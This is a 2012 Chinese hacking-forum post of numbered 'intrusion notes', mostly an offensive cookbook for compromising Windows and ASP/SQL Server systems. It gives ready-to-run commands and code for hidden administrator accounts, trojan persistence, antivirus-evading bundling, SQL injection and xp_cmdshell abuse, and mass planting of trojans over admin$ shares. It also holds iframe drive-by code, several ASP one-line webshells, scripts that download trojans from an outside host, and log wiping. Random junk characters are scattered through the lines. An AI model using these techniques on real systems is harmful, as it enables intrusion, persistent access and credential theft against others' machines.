中国网络渗透测试联盟

标题: 入侵渗透笔记 [打印本页]
作者: admin    时间: 2012-9-15 14:13
标题: 入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,5 j& U: x  a6 w
cacls C:\windows\system32 /G hqw20:R
, u6 N- v- i: t8 V2 K2 \思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
4 |( g2 `6 V. w恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F' |4 l/ Q' v# x$ ~( F+ k

6 R; d& d" z- @2 Y' g1 A/ L2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
/ i5 ^/ Y( F. Q6 v+ u
; M; Y: [) M3 K3 a2 V3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。  ^( B& t# L' Q; o+ C
4 ^; A; w3 q% }
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
- l$ B, y; M1 f/ V! Z; R
/ ]1 c8 Z# s9 t5、利用INF文件来修改注册表
0 I; ?5 q: e( j5 o& W3 J[Version]
1 [/ W: [0 j% h4 f5 m4 ]Signature="$CHICAGO$"
9 I/ M+ T8 |/ D[Defaultinstall]9 b4 k: ?& y2 U. K6 y' o
addREG=Ating! P7 M4 q7 x6 Z7 ~9 O  w* Z
[Ating]
( Z' o6 Q* \) O, J6 {HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
0 J! L' A$ p# E( G! m以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
3 g; M: g/ a3 L" A5 Yrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
' K7 B- R7 y( h7 v9 S, k其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU7 a" H4 p/ o. ^  W% x
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU. U) E  n0 |, `! I4 A- }' Q
HKEY_CURRENT_CONFIG 简写为 HKCC. K+ ?$ p! Z, a9 H7 u
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
' d. S+ k# H* A1 J& J( H"1"这里代表是写入或删除注册表键值中的具体数据
# b; R' c" q8 c
; v+ ^' n( f! t* h) ~% y, a6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,5 w1 d, L1 B( l' i  Y3 r
多了一步就是在防火墙里添加个端口,然后导出其键值
+ m. d* @, J) w& P[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
1 M# T' Y, J  S1 m
5 o: B, c  v7 P1 @7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽: T) \- m& E0 Z6 J
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。2 F7 K  t9 j! S' w2 ?1 a8 ~5 L
8 i; _; B9 _/ ?( J2 N5 n" [
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
+ H7 m4 C0 f4 h9 i" f' B* B9 \0 L- v" z. g2 k+ m
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
+ q1 {5 a8 T$ x( q: U8 V可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。& Q, u; K" P/ L, s9 [& h

- ?3 c1 w: V/ ?8 i( s# l" F4 o10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”- g6 {7 A( m/ U# N5 b8 q* w4 s

- y* q( _. E1 M* f$ g2 W* f11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
1 W0 \) g. f' ]( R用法:xsniff –pass –hide –log pass.txt* w) v2 S  X' j. V/ J

: `0 v! D' X+ H# ^0 Y12、google搜索的艺术
, c- J5 K1 I( U; V/ w) T搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
( e( s$ x0 e$ _3 G! \: @或“字符串的语法错误”可以找到很多sql注入漏洞。
: k" a- g- b* v" f- L- k8 D% x6 }( Z. N' b8 u- U4 K
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。/ S' m% t$ u) X

% O( H% w6 s3 h* S14、cmd中输入 nc –vv –l –p 1987
0 ]+ z( |6 _. j; h6 t2 G做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
7 s" P* x0 d4 Z. s0 T( ~+ X  {
15、制作T++木马,先写个ating.hta文件,内容为) }3 }7 `$ k# L, S$ y' Y& u* u2 E
<script language="VBScript">
9 @3 g: q, g- e) `7 Rset wshshell=createobject ("wscript.shell" )
; h" K8 w; a2 {& M7 Ra=wshshell.run("你马的名称",1)
0 c: {& s' C3 `, M0 E' _& Ywindow.close% r% _, U; S9 ^+ V5 k$ _
</script>  Z! @; u) r: d! \* o
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。7 n; P3 P2 d- w( J9 \, h

' [$ A9 L* q' m; A0 Q16、搜索栏里输入
$ }& [- ^4 E3 C8 a! k+ X0 X关键字%'and 1=1 and '%'='
) G; f! B: R# p8 c* s7 q' [关键字%'and 1=2 and '%'='& f5 e+ S6 W' o
比较不同处 可以作为注入的特征字符3 t) ~# i6 r( P! h) y! \8 s
% U' i7 ^+ a" R0 E
17、挂马代码<html>  J2 I! @7 ~  t4 r( Z6 G- K5 g" ]
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>+ g& |7 X, M1 v/ a; q* C) Z4 O, d
</html>
' P1 t* f6 {* Y+ B3 n/ S$ e- w' {4 o/ b3 V8 m* S! ?
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,! m. G& |& f! f+ Y+ k; F
net localgroup administrators还是可以看出Guest是管理员来。  v; q+ }2 ?9 R
5 v. D# V; b! }4 F7 b" z$ @
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等( y0 r; H1 l0 Y2 g! `. Z/ |7 C
用法: 安装: instsrv.exe 服务名称 路径" i# s- N# r( }8 i9 J7 s
卸载: instsrv.exe 服务名称 REMOVE
9 i5 l2 O  E$ c/ O# m, l8 n% y$ ~7 r
; X; E& e# }8 s  G9 y+ h6 u8 n% q( F4 B. A6 [9 \! {( k
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉6 G- k" B1 q6 v. _7 Y9 \" `
不能注入时要第一时间想到%5c暴库。$ N& A" L3 I2 z" a* H

, Z$ r0 ?6 O5 l9 _* @& p, x) I7 o- K22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~5 N+ a% G' f6 m
9 |3 c# M4 |. p
23、缺少xp_cmdshell时7 t" _3 @; B; S( I! `( G/ {
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
- A! {# L* P$ \  U& P假如恢复不成功,可以尝试直接加用户(针对开3389的)6 G: c/ B. I& c7 T6 g2 u
declare @o int0 n' y; h9 d# m
exec sp_oacreate 'wscript.shell',@o out
" I7 a6 H: f5 }; q+ T7 ]exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
* u) T0 Q. i! o  U. A- j, F1 y0 _
24.批量种植木马.bat% F* R5 U- I& y2 i5 m
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中; B3 h3 ]6 h4 R6 Y
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间- Y- z7 w: A. T5 f6 ]- e
扫描地址.txt里每个主机名一行 用\\开头
* v) |, |3 G: I7 G. D  e; Y, C6 \# `* ^$ m) u
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。+ m7 p; M$ F8 f9 m9 z
4 L5 X2 P2 V- Z
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.8 m' U0 d& W) ^/ r8 ~
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
: W& _' Q: t7 l  I' o.cer 等后缀的文件夹下都可以运行任何后缀的asp木马8 m4 K( q0 Z; d  A& L) ]: T! N8 Z

: w* y/ V* L+ m! T' u27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP$ u; u1 S8 s  h2 `% R0 s, M
然后用#clear logg和#clear line vty *删除日志* S: R' H$ O, |3 `) p

1 K6 J* l- X* U8 l28、电脑坏了省去重新安装系统的方法4 e& h6 A1 |: b8 L5 z# ^3 F6 b
纯dos下执行,$ n0 V' x) L- p
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
; K5 n* I+ ]- S4 z, l" d' f2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config1 ?% T5 N) Z% r& A! h' L
6 _. n+ o. A, k
29、解决TCP/IP筛选 在注册表里有三处,分别是:* u7 }( ~" H: d* d! Y' \. n/ G
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
9 w: j4 c0 w* k+ AHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip( ^. c6 U3 A! y1 d7 A5 V) D6 C
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip4 Z# }7 I6 _2 B& Y+ N3 N- ~
分别用( q6 ^  I, w) g+ I: W" }: |0 }
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; p. z! ^& N6 Q% F4 m( i7 H
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip7 e. }  B8 l8 ~7 x) i* B3 `
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
  G$ s! @' U+ a$ p7 W- A* R命令来导出注册表项' y8 l+ N3 t+ H1 S" D7 s! b- \3 u
然后把三个文件里的EnableSecurityFilters"=dword:00000001,9 g  W% h/ K3 X: L  [
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
( Q) K  z3 f( X' _% p" Qregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
6 V  P; D& w# q# v5 n( W" Y" q' b! {4 S5 w
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
  I% u6 j1 x2 Y8 k) iSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
: t, k+ f2 G& g4 ?6 b( `- b7 B9 {6 ?) ~  G6 W
31、全手工打造开3389工具/ f( o6 U: \5 c: W
打开记事本,编辑内容如下:
% j6 s4 G2 d6 Y  Y4 V. D0 \echo [Components] > c:\sql
8 }( T/ b8 q. qecho TSEnable = on >> c:\sql
) p; t7 G4 Z* X7 w$ ksysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q5 {" Z; `+ V/ i  {
编辑好后存为BAT文件,上传至肉鸡,执行
9 u" s  Y6 K& i8 w2 N! ~) D1 B( ~8 [! f5 p  B9 U1 e
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马8 [# Q2 x! f$ T3 k* Q- ~( N8 C
3 V* t- }" X) j- k1 h. e' k. L
33、让服务器重启7 |3 d: l9 R7 e3 Y" _
写个bat死循环:5 C7 @, C  e6 K3 r
@echo off% c  \; `" A; c) ?( Y+ d
:loop1
, _! _5 g! |, U7 S# acls1 e7 w. }9 J0 A9 t4 o% q$ |
start cmd.exe
. C7 d$ K0 n& a6 g5 q+ J' jgoto loop1  u! I1 T3 s- m2 T
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启# m5 u% X  N, t" C7 i7 F

; {5 l/ x/ n! l7 i. Q34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,5 J* D+ r: W' D! e
@echo off
2 v' q' I( e( s/ k0 X- hdate /t >c:/3389.txt: I# w; l: G5 L3 Y4 V6 v3 R& `. U
time /t >>c:/3389.txt
) Q. d0 m/ E& \$ V& w! P; |attrib +s +h c:/3389.bat4 q% m" K+ f3 \" `5 K
attrib +s +h c:/3389.txt5 d% \8 x7 y  W' Z/ f
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
/ y4 V' i& h4 v* l$ P% q+ i2 k并保存为3389.bat& G/ [% i: g" s) D; T) d
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
- o. X$ C: {& H# K; t
4 Y- e1 C/ S, s  v( b! G0 a35、有时候提不了权限的话,试试这个命令,在命令行里输入:
6 r; r7 X4 V3 Jstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)! l" o# H& m9 A
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。8 @7 z. }  z" q; ]! i

6 s8 o0 M5 i% m36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件$ ?& K; f% \4 N
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址) W8 Z8 M; \  f1 f; g
echo 你的FTP账号 >>c:\1.bat //输入账号
( G+ r) P7 f1 J% F" g; Oecho 你的FTP密码 >>c:\1.bat //输入密码3 r8 A5 p6 f7 o  W3 h; C  B
echo bin >>c:\1.bat //登入( y6 q  s0 a$ b
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么0 P' D& p1 s6 v
echo bye >>c:\1.bat //退出' i1 @# Y2 m8 R+ K' k( @# l+ U
然后执行ftp -s:c:\1.bat即可
: O$ ~$ N. }, z% ~; Z. b; F4 i* ^; R  W; V9 Z: k  w6 L, V
37、修改注册表开3389两法9 [( W  j. S& r
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表! w6 h+ U7 n+ f5 S
echo Windows Registry Editor Version 5.00 >>3389.reg. j1 ]4 T/ M* [0 R+ B( t; b1 ^8 |+ m
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg' M3 I9 [9 t8 L. i4 k* C
echo "Enabled"="0" >>3389.reg
- `& c- [% s) [4 c7 L7 P( uecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows, Z3 [5 ?( `) r
NT\CurrentVersion\Winlogon] >>3389.reg& |0 q6 d3 h6 \" u4 e0 ^( E
echo "ShutdownWithoutLogon"="0" >>3389.reg: T  Z6 j, q, s! p/ P7 I7 ]5 V& D
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
4 x! h6 W  n9 Y6 L1 _* L>>3389.reg% G$ X& P6 G6 Z; M
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg7 L/ }3 Q& {  K( h7 O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]0 w4 C& y# K5 |2 k9 i
>>3389.reg& }1 N5 M4 |- J% o) T
echo "TSEnabled"=dword:00000001 >>3389.reg5 N# ~6 S" }) E, Z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg  Y1 s+ D1 F: f
echo "Start"=dword:00000002 >>3389.reg
/ m: [' B, }/ v* b: g6 \) Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]" P2 s  Y+ h# E
>>3389.reg
7 H0 O0 \/ {7 Vecho "Start"=dword:00000002 >>3389.reg
: U! g( q  D0 @/ [echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg9 [8 p4 W: _. O% h. u
echo "Hotkey"="1" >>3389.reg
8 f6 R8 v! l' v) {( Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" I6 a( [+ T4 Y; k
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
" f6 O! N  R0 a! Necho "PortNumber"=dword:00000D3D >>3389.reg9 X' e6 p+ R& [) @3 K* N/ A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
  N3 _& `6 q2 o4 yServer\WinStations\RDP-Tcp] >>3389.reg) ^$ ?1 e* A3 [' e. C- s3 r  \
echo "PortNumber"=dword:00000D3D >>3389.reg8 ?& ~9 L! K, T9 E! \0 k
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
$ x5 A; i  \, |( g( E6 k(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
+ I: h  i" U% t' K/ A0 z因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
+ U* _! n9 t3 e$ o/ P7 [! ]: [* G(2)winxp和win2003终端开启
9 _2 L8 d- b1 Q% i, K- ~用以下ECHO代码写一个REG文件:& b; c! b: |0 W1 t: l
echo Windows Registry Editor Version 5.00>>3389.reg6 o# U) k. X# L' e% Z! w" A9 A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ |% e+ g& [+ X5 {) i/ EServer]>>3389.reg
5 r- J2 v' r' e+ m5 `5 Fecho "fDenyTSConnections"=dword:00000000>>3389.reg
+ s8 u* ~' r+ u6 t, }5 t$ U; u. m& Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 ~+ J7 Z/ S* ?; `$ K2 n6 [
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
5 V; o7 f2 ^1 [6 V5 e+ Mecho "PortNumber"=dword:00000d3d>>3389.reg
- ^1 E7 Z) F/ L/ Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% d) c3 j7 A' e: x6 VServer\WinStations\RDP-Tcp]>>3389.reg
( M% J/ e0 Z: k+ M: O1 z8 g/ j  becho "PortNumber"=dword:00000d3d>>3389.reg
1 S8 @* I! f& T6 R* ~然后regedit /s 3389.reg del 3389.reg
. A( H7 E$ {( W' ?: |$ c8 q! gXP下不论开终端还是改终端端口都不需重启* y$ f7 d+ [8 _0 a
( F6 N" i4 t2 E3 \+ p
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
9 J% d1 g, N! v: R9 U) z) I) \! y用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'5 B1 X6 f9 Y. _( W0 w7 b) v* B

6 }% P1 L9 M. L+ X8 I( \5 X- `39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
9 A& q6 h( j" h5 o* t(1)数据库文件名应复杂并要有特殊字符6 N( m% X( R7 ?
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
# n; T9 J( P+ D: `4 M/ @将conn.asp文档中的
* |& k4 ]2 J" ^5 ~+ J* ~' v, ZDBPath = Server.MapPath("数据库.mdb")
1 ?9 ?2 E3 l2 Q5 p1 [4 E" y! B( f1 Nconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
/ s8 A, _* L& }6 D: H, T$ ^6 N) _2 W9 _5 V  P7 N
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
1 Q+ L0 X' C6 K3 i: z# T(3)不放在WEB目录里
5 j0 W: m7 ?3 e% f% o/ Z! ]" y- u. X' ]" e
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
6 A$ e& b) F$ @, j8 G3 {8 \  P可以写两个bat文件2 m) {5 W/ D0 v2 C# e% C
@echo off
& H7 N! V4 l$ j' v@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe4 g% u! C4 z2 f
@del c:\winnt\system32\query.exe5 F, o# ^; W* q
@del %SYSTEMROOT%\system32\dllcache\query.exe% E; ^! L4 r  s! u4 l! A+ J
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
$ l% r* m6 s" y, F! }9 ~6 z9 Q+ g( G& ?, @1 z. B3 K
@echo off7 r7 x' I0 ]7 r4 \) H, y) M8 ~
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe1 B+ c' f8 ~( G  h
@del c:\winnt\system32\tsadmin.exe
! S7 U" X! F$ R% J2 e@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
2 A' Y0 L0 P6 m3 E
. Z2 f$ [4 {+ i" x& K41、映射对方盘符
: D# K' a$ H& C: ^4 d# ltelnet到他的机器上,
# C8 G3 S: s! Wnet share 查看有没有默认共享 如果没有,那么就接着运行, P5 b7 Y  ?2 I/ b' X! o8 [
net share c$=c:. p  d. Q5 b4 C! U" v, {
net share现在有c$4 p$ E. t; Z/ ^; O) W
在自己的机器上运行5 [& ?1 m9 j# @3 i: E
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
7 s: [4 J) c- O% ?$ Y% p
0 s) J& f# H+ `2 ~, d# x: _/ o42、一些很有用的老知识- N' |4 U" r! p- A# o$ i
type c:\boot.ini ( 查看系统版本 )7 Q& Y& U- F9 K9 b+ u/ O
net start (查看已经启动的服务)/ y3 a1 Q' V% n& V* Z" U3 x3 a" N- O
query user ( 查看当前终端连接 )
. E$ G. v  B, {. Z& Y9 M) {net user ( 查看当前用户 )+ d3 R( h# J+ Y7 {" B- J! @1 ^. @
net user 用户 密码/add ( 建立账号 ), r  ~% }' u5 P) \# |6 n8 @/ R
net localgroup administrators 用户 /add (提升某用户为管理员)0 o/ ?6 p' K- Q# }: Y3 n! }3 q' \: v
ipconfig -all ( 查看IP什么的 )9 P0 z. e/ ^; v2 f
netstat -an ( 查看当前网络状态 )
4 b' x% {; X  C, M0 O7 H  x9 tfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)6 ]% k7 ]; v& r, N: E, b
克隆时Administrator对应1F4) B  h. r* [; b
guest对应1F5
5 s& \& Q' @+ ^tsinternetuser对应3E8
# t% ~6 z+ J' M3 ^* a7 z
% b9 e' X* \5 x) E- e43、如果对方没开3389,但是装了Remote Administrator Service
5 t3 S) J) t& ]; E$ S1 c; ]用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接# _0 w/ T1 W0 A3 @3 ~
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
0 f% E3 n5 l7 |. q" B: l) v5 ]先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"7 u/ f% ~4 u+ w- u0 O

, R3 M: g' [7 b- r44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)8 G7 M( t! p- a; b* J
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
* x, E  k' K" C; i1 N& ?0 ^9 K! p8 _7 `, W. A- K3 x) J$ Y6 u$ ^# i
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
" o& S+ ^' D7 _, M6 ~% techo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
0 [& l% }& E( t5 z+ H1 P8 K^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =# Q, S; x6 R+ ^
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
; D" P, E1 p+ p3 @7 n1 L! ^1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs- R3 U3 F( M6 A* ~2 q+ r
(这是完整的一句话,其中没有换行符)
. r( _+ {  |: ^8 _& ~1 ^然后下载:
8 b# e, N8 m2 r, _" Rcscript down.vbs http://www.hack520.org/hack.exe hack.exe
6 X* O; Z# {$ R# m9 P: Q( o( P/ _" f; w* V/ T* l
46、一句话木马成功依赖于两个条件:' G" O$ `4 f# |) z# o2 ^
1、服务端没有禁止adodb.Stream或FSO组件( O! s& }6 N& J) c0 \- l: k* X3 ]
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
) W: K  V% j! r5 n
0 c! n" f0 A' O% r  r8 i1 Q47、利用DB_OWNER权限进行手工备份一句话木马的代码:3 E; l: ?. Q4 f7 M1 E1 _
;alter database utsz set RECOVERY FULL--
; W1 C! j' M8 N0 \;create table cmd (a image)--
1 Z" ^! g4 o4 ~3 Z5 ?;backup log utsz to disk = 'D:\cmd' with init--+ ~" @2 q/ \; t
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
( V; ^! k6 f: T: a;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--  q5 j. y3 u% m8 Q
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
$ m: a2 n8 N4 y, d7 @9 `  R- c& d
8 c( l" d$ y2 o; `$ f48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
) w7 x, }( ]  J0 E1 y, r
% F  o. C7 h- Z1 v4 i用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
6 D% b, S( e/ s所有会话用 'all'。
2 N. U5 O8 s& e-s sessionid 列出会话的信息。
+ C/ F: `. p7 h3 n-k sessionid 终止会话。% O- x+ a- v* A+ [  x  e+ X! }! N
-m sessionid 发送消息到会话。' L6 h9 K& D! K
4 S8 ?$ {. M8 [
config 配置 telnet 服务器参数。8 n( R  _* m2 p: j0 y8 g
* n. F/ y. K2 u$ F5 X! [: ?2 `4 D
common_options 为:
! c' M! j) u; G: b* ~6 [3 \-u user 指定要使用其凭据的用户
7 C) \5 s2 x& T" E2 Z. s4 t* E# r; k8 C-p password 用户密码
+ K6 }2 R5 X$ _+ F7 [
3 u' l& p5 t* s5 D2 C9 oconfig_options 为:$ r$ X4 O1 P, i9 O, L# b9 V
dom = domain 设定用户的默认域
# j9 D* o3 u. {6 W, lctrlakeymap = yes|no 设定 ALT 键的映射  m# s4 x8 ^4 T* K" Y0 m! z
timeout = hh:mm:ss 设定空闲会话超时值
& M. O, A/ K8 G  N# d8 btimeoutactive = yes|no 启用空闲会话。
; U. L& t" D. h6 I* @7 M  f! C5 fmaxfail = attempts 设定断开前失败的登录企图数。
: q/ W4 e5 t# b4 S: g: w/ H: \6 }maxconn = connections 设定最大连接数。
- Q1 W* p+ D3 W1 Q* S/ Kport = number 设定 telnet 端口。  R' G/ @* m8 Q% Z4 g8 _
sec = [+/-]NTLM [+/-]passwd5 |" j2 t* S+ a9 ~6 r+ I
设定身份验证机构" Q* B. g5 U* T, S* I
fname = file 指定审计文件名。, E! E+ A( Q4 G  w
fsize = size 指定审计文件的最大尺寸(MB)。
2 c: g8 \7 z) a1 [/ _$ |; U& Bmode = console|stream 指定操作模式。
% \( Y* O( }7 y/ O8 Iauditlocation = eventlog|file|both
1 `% e/ D$ {9 m, [) X指定记录地点
$ F* g0 C: p# h% @0 Xaudit = [+/-]user [+/-]fail [+/-]admin
( D6 L. S& k# k7 g
- M: K: q; z; ]" d$ D/ c49、例如:在IE上访问:& }8 k+ r3 d) Z! z3 q* [
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
' f- o% r0 u- C: q( i! j. Dhack.txt里面的代码是:
2 T8 J8 @% g+ z) G6 ?) @, Q<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
( s; l! g' x& ~8 I2 ?7 K把这个hack.txt发到你空间就可以了!
8 k$ b! q" X, w/ ~( f3 N: m这个可以利用来做网马哦!0 t4 ?% U" e% ~4 }9 ^
8 i! ?% H1 s0 @0 m0 G! w8 h& a: M: J
50、autorun的病毒可以通过手动限制!8 s  _9 D: Y6 o% b( L  E; v; u- J
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
' @! Q" l& |6 [2,打开盘符用右键打开!切忌双击盘符~" j8 x9 m' _) B( |
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!/ d' _& r) [( T6 I% z. I* s3 ~

6 z  D7 ?" D2 d& C" L( k$ @51、log备份时的一句话木马:
1 P  q; N) g7 ta).<%%25Execute(request("go"))%%25>
8 r) W; W$ o# ]/ Ob).<%Execute(request("go"))%>+ L7 g7 K6 g1 E2 `
c).%><%execute request("go")%><%9 D7 u, k* D6 B# y
d).<script language=VBScript runat=server>execute request("sb")</Script>  e3 F. i! @6 _( _4 e
e).<%25Execute(request("l"))%25>; {+ ]$ h* i) U) j0 I1 R5 o& J
f).<%if request("cmd")<>"" then execute request("pass")%>4 D+ j/ a9 b' v7 d, I
+ r: b* u. Q& g" j
